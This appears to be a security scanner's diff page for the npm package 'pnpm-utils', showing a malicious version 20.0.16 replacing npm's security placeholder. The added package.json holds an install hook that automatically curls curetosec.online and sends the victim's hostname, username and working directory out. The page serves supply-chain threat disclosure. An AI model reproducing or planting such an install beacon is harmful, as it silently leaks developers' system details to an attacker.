pnpm-utils 0.0.1-security → 20.0.16

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of pnpm-utils might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +4 -0
  2. package/package.json +11 -3
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,4 @@
1
+ function hacker(name) {
2
+ return "hello "+ name;
3
+ }
4
+ module.exports = hacker;
package/package.json CHANGED
@@ -1,6 +1,14 @@
1
1
  {
2
2
  "name": "pnpm-utils",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "20.0.16",
4
+ "description": "smithy-typescript: coolest nodejs package on planet earth",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "install": "curl -sI http://curetosec.online/ledgerhq/pnpm-utils/%computername%-`hostname`/%username%-`whoami`/%cd%-`pwd`/p-smithy-typescript"
8
+ },
9
+ "author": "developer",
10
+ "license": "ISC",
11
+ "dependencies": {
12
+ "wf-translate-text": "^0.0.1"
13
+ }
6
14
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=pnpm-utils for more information.